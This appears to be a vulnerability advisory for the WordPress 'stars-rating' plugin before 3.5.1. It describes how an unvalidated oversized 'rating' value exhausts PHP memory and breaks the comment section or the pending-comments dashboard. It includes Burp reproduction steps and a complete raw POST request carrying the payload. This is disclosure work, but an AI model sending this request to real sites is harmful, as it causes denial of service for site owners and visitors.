The plugin does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service in the comments section, or pending comment dashboard depending if the user sent it as unauthenticated or authenticated.
Enable rating for a post/page, add a comment, capture the request in Burp Change the POST Parameter “rating” to a large integer. POST /wp-comments-post.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 139 Connection: close Upgrade-Insecure-Requests: 1 rating=1000000000000000000&comment;=aa&author;=aa&email;=aa%40aa.com&url;=&submit;=Post+Comment&comment;_post_ID=2123&comment;_parent=0 Then forward it. The DoS can be seen in the pending comment dashboard for unauthenticated comments, otherwise (authenticated comment), the comment section on the post will not load properly and will have an error such as Allowed memory size of 268435456 bytes exhausted (tried to allocate 232783904 bytes) in /var/www/wp-content/plugins/stars-rating/public/stars-rating-public.php on line 312
CPE | Name | Operator | Version |
---|---|---|---|
stars-rating | lt | 3.5.1 |